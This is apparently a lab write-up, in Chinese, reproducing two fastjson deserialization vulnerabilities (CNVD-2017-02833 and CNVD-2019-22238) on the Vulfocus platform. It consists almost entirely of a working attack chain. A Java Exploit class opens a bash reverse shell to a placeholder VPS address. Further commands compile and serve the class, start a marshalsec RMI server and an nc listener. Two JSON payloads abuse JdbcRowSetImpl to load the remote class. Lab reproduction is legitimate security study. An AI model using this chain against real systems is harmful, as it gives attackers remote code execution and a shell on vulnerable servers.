【Vulfocus漏洞复现】fastjson-cnvd_2017_02833、fastjson-cnvd_2019_22238

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/xxxxxxxx/1122 0>&1"});		#xxxxxxxx为vps的ip地址
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }
    public static void main(String[] args) throws Exception {
    }
}

1
2
javac Exploit.java

1
2
python3 -m http.server --bind 0.0.0.0 1234

1
2
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://xxxxxx:1234/#Exploit" 9999

1
2
nc -lvvp 1122

1
2
3
4
5
6
7
8
9
10
11
12
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://xxxxxxx:9999/Exploit",	#xxxxxxx为vps的ip地址
        "autoCommit":true
    }
}

1
2
3
4
5
6
7
8
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://xxxxx:9999/Exploit",	#xxxxx为vps的ip地址
        "autoCommit":true
    }
}